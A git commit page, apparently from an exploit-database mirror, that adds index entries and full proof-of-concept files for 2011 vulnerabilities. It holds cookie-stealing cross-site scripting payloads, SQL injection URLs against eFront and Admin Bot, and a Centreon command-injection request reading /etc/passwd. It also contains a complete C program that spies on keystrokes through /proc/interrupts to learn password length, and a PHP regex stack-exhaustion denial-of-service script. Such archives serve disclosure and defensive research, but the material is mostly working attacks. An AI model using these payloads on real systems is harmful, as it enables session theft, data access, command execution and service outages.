Update: 2015-03-07

13 new exploits
kakakacool · Mar 7, 2015 · 4b5c85f · 4b5c85f
1 parent b109a86
commit 4b5c85f
Show file tree

Hide file tree

Showing 14 changed files with 513 additions and 0 deletions.
diff --git a/files.csv b/files.csv
@@ -32702,3 +32702,16 @@ id,file,description,date,author,platform,type,port
 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
 36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0
 36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0
+36282,platforms/php/webapps/36282.txt,"eFront 3.6.x Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-11-02,"High-Tech Bridge SA",php,webapps,0
+36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting Vulnerability",2011-11-03,"Stefan Schurtz",php,webapps,0
+36284,platforms/asp/webapps/36284.txt,"CmyDocument Multiple Cross Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0
+36285,platforms/windows/dos/36285.c,"Microsoft Windows TCP/IP Stack Reference Counter Integer Overflow Vulnerability",2011-11-08,anonymous,windows,dos,0
+36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 'file' Parameter Local File Disclosure Vulnerability",2011-11-04,"Todor Donev",hardware,remote,0
+36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 's' Parameter Cross Site Scripting Vulnerability",2011-11-04,3spi0n,php,webapps,0
+36288,platforms/multiple/dos/36288.php,"Multiple Vendors libc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0
+36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting Vulnerability",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
+36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection Vulnerability",2011-11-07,baltazar,php,webapps,0
+36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
+36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
+36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
+36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
diff --git a/platforms/asp/webapps/36284.txt b/platforms/asp/webapps/36284.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/50512/info
+
+CmyDocument is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+POST http://www.example.com/login.asp
+username="><script>alert(&#039;demonalex&#039;)</script>&password=bbb&rememberme=a&submit=+++Login+++
+
+POST http://www.example.com/login2.asp
+username="><script>alert(&#039;demonalex&#039;)</script>&password=bbb&rememberme=a&submit=+++Login+++
+
+http://www.example.com/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
+
+http://www.example.com/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
+
diff --git a/platforms/hardware/remote/36286.txt b/platforms/hardware/remote/36286.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50520/info
+
+DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+DreamBox DM800 versions 1.5rc1 and prior are vulnerable. 
+
+http://www.example.com/file/?file=[LFD] 
diff --git a/platforms/linux/local/36294.c b/platforms/linux/local/36294.c
@@ -0,0 +1,213 @@
+source: http://www.securityfocus.com/bid/50573/info
+
+The Linux kernel is prone to a local information-disclosure weakness.
+
+Successful exploits allow local attackers to obtain the password length of a victim's account; information harvested may aid in further attacks.
+
+Linux kernel 3.1 and prior are vulnerable. 
+
+/*
+ * A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.
+ * 
+ * The file /proc/interrupts is world readable.  It contains information
+ * about how many interrupts were emitted since the system boot.  We may loop
+ * on one CPU core while the victim is executed on another, and learn the length
+ * of victim's passord via monitoring emitted interrupts' counters of the keyboard
+ * interrupt.  The PoC counts only keystrokes number, but it can be easily extended
+ * to note the delays between the keystrokes and do the statistical analysis to
+ * learn the precise input characters.
+ * 
+ * The limitations:
+ *   - it works on 2-core CPUs only.
+ *   - it works on 1-keyboard systems only.
+ *   - it doesn't carefully count the first and last keystrokes (e.g. ENTER after
+ *     the password input).
+ *   - it doesn't carefully filter keystrokes after ENTER.
+ * 
+ * by segoon from Openwall
+ *
+ * run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu
+ *
+ * P.S.  The harm of 0444 /proc/interrupts is known for a long time, but I
+ * was told about this specific attack vector by Tavis Ormandy just after similar
+ * PoC spy-sched was published.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <err.h>
+#include <errno.h>
+#include <string.h>
+
+
+int i8042_number;
+int ints[1024], ints_prev[1024], ints_delta[1024];
+
+char buffer[1024];
+
+int reread_ints(int *interrupts, int int_count, char **names)
+{
+    int i;
+    int n, c1, c2;
+    char s1[1024], s2[1024];
+
+    int interrupts_fd;
+    FILE *interrupts_file;
+
+    interrupts_fd = open("/proc/interrupts", O_RDONLY);
+    if (interrupts_fd == -1)
+        err(1, "open(\"/proc/interrupts\")");
+
+    interrupts_file = fdopen(interrupts_fd, "r");
+    if (interrupts_file == NULL)
+        err(1, "fdopen");
+
+    if (fseek(interrupts_file, 0, SEEK_SET) < 0)
+        err(1, "lseek");
+
+    fgets(buffer, sizeof(buffer), interrupts_file);
+
+    for (i = 0; i < int_count; i++) {
+        if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) {
+            fclose(interrupts_file);
+            return i;
+        }
+
+        if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) {
+            fclose(interrupts_file);
+            return i;
+        }
+
+        if (names != NULL && names[i] == NULL)
+            names[i] = strdup(s2);
+
+        interrupts[i] = c1 + c2;
+    }
+
+    fclose(interrupts_file);
+    return int_count;
+}
+
+void init_i8042_number(void)
+{
+    int i;
+    int can_be_keyboard[1024];
+    char *names[1024];
+    int number_of_interrups, can_be_keyboard_numbers;
+
+    number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names);
+
+    /*
+     * Identify the i8042 interrupt associated with the keyboard by:
+     * 1) name should be i8042
+     * 2) interrupts count emitted in one second shouldn't be more than 100
+     */
+    for (i = 0; i < number_of_interrups; i++)
+        can_be_keyboard[i] = strcmp(names[i], "i8042") == 0;
+
+    while (1) {
+        sleep(1);
+        reread_ints(ints, sizeof(ints), NULL);
+
+        can_be_keyboard_numbers = 0;
+        for (i = 0; i < number_of_interrups; i++) {
+            can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100;
+            if (can_be_keyboard[i])
+                can_be_keyboard_numbers++;
+
+            ints_prev[i] = ints[i];
+        }
+
+        if (can_be_keyboard_numbers == 1) {
+            for (i = 0; i < number_of_interrups; i++)
+                if (can_be_keyboard[i]) {
+                    i8042_number = i;
+                    printf("i8042 keyboard is #%d\n", i);
+                    return;
+                }
+        }
+    }
+}
+
+int i8042_read(void)
+{
+    reread_ints(ints, sizeof(ints), NULL);
+    ints_prev[i8042_number] = ints[i8042_number];
+
+    return ints[i8042_number];
+}
+
+int wait_for_program(char *pname)
+{
+    FILE *f;
+    int pid;
+    char s[1024];
+
+    snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;"
+           " sleep 0.1; done", pname);
+    system(s);
+    snprintf(s, sizeof(s), "pgrep %s", pname);
+    f = popen(s, "r");
+    if (f == NULL)
+        err(1, "popen");
+
+    if (fgets(buffer, sizeof(buffer), f) == NULL)
+        err(1, "fgets");
+
+    if (sscanf(buffer, "%d", &pid) < 1)
+        err(1, "sscanf");
+
+    pclose(f);
+
+    return pid;
+}
+
+int main(int argc, char *argv[])
+{
+    int n, old, sum, i;
+    int pid;
+    char *pname = argv[1];
+
+    if (argc < 2)
+        errx(1, "usage: spy-interrupts gksu");
+
+    puts("Waiting for mouse activity...");
+    init_i8042_number();
+
+    pid = wait_for_program(pname);
+    printf("%s is %d\n", pname, pid);
+
+    old = i8042_read();
+
+    sum = 0;
+
+    while (1) {
+        n = i8042_read();
+        if (old == n)
+            usleep(10000);
+        else {
+            for (i = 0; i < n-old; i++)
+                putchar('.');
+            fflush(stdout);
+        }
+
+        sum += n - old;
+        old = n;
+
+        if (kill(pid, 0) < 0 && errno == ESRCH)
+            break;
+    }
+
+    /*
+     * #interrupts == 2 * #keystrokes.  
+     * #keystrokes = len(password) - 1  because of ENTER after the password.
+     */
+    printf("\n%d keystrokes\n", (sum-2)/2);
+
+    return 0;
+}
diff --git a/platforms/multiple/dos/36288.php b/platforms/multiple/dos/36288.php
@@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/50541/info
+
+Multiple Vendors' libc library is prone to a denial-of-service vulnerability due to stack exhaustion.
+
+Successful exploits will allow attackers to make the applications that use the affected library, unresponsive, denying service to legitimate users.
+
+The libc library of the following platforms are affected:
+
+NetBSD 5.1
+OpenBSD 5.0
+FreeBSD 8.2
+Apple Mac OSX
+
+Other versions may also be affected. 
+
+<?
+/*
+PHP 5.4 5.3 memory_limit bypass exploit poc
+by Maksymilian Arciemowicz http://cxsecurity.com/
+cxib [ a.T] cxsecurity [ d0t] com
+
+To show memory_limit in PHP
+
+# php /www/memlimpoc.php 1 35000000
+PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in
+/var/www/memlimpoc.php on line 12
+
+Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in
+/var/www/memlimpoc.php on line 12
+
+and try this
+
+# php /www/memlimpoc.php 2
+
+memory_limit bypassed
+*/
+
+ini_set("memory_limit","32M");
+
+if($argv[1]==1)
+$sss=str_repeat("A",$argv[2]);
+elseif($argv[1]==2)
+eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
+((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
+1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
+1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
+1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
+1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
+1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
+1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");
+
+?>
diff --git a/platforms/php/webapps/36282.txt b/platforms/php/webapps/36282.txt
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/50492/info
+
+eFront is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the software fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/index.php?message=1&message_type=%22%20onmouseover=alert%28document.cookie%29%3E
+
+http://www.example.com/professor.php?ctg=%22%20onmouseover=%22alert%28document.cookie%29
+
+http://www.example.com/student.php?ctg=%22%20onmouseover=%22alert%28document.cookie%29
+
+Successful following exploit requires attacker to be registered and logged-in:
+
+http://www.example.com/view_test.php?done_test_id=1%20union%20select%201,2,%28select%20version%28%29%29,4,5,6,7,8,9,10, 11,12%20--%20
+
+Successful following exploits require that "magic_quotes_gpc" is off:
+
+http://www.example.com/view_test.php?test_id=1&user=%27SQL_CODE_HERE
+
+http://www.example.com/view_test.php?content_id=2&user=%27SQL_CODE_HERE
+
+http://www.example.com/modules/module_chat/admin.php?force=getLessonFromId&loglessonid=-1%27%20union%20select%20ver sion%28%29%20--%202
+
+http://www.example.com/ask_information.php?common_lessons=1&user1=professor&user2=%27%20union%20select%201,vers ion%28%29%20--%20
diff --git a/platforms/php/webapps/36283.txt b/platforms/php/webapps/36283.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50502/info
+
+Serendipity is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Serendipity 1.5.5; prior versions may also be affected. 
+
+http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]=</script><script>alert(document.cookie)</script>&go=+-+Go!+-+
diff --git a/platforms/php/webapps/36287.txt b/platforms/php/webapps/36287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50527/info
+
+The Bonus theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Bonus 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/?s="><script>alert("3spi0n")</script>
diff --git a/platforms/php/webapps/36289.txt b/platforms/php/webapps/36289.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50552/info
+
+SmartJobBoard is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E 
diff --git a/platforms/php/webapps/36290.txt b/platforms/php/webapps/36290.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50562/info
+
+Admin Bot is prone to an SQL Injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. 
+
+http://www.example.com/news.php?wgo=666+and+1=2+union+all+select+0,1,BALTAZAR,3,4,5,6,7,8-- 
diff --git a/platforms/php/webapps/36293.txt b/platforms/php/webapps/36293.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50568/info
+
+Centreon is prone to a remote command-injection vulnerability.
+
+Attackers can exploit this issue to execute arbitrary commands in the context of the application.
+
+Centreon 2.3.1 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1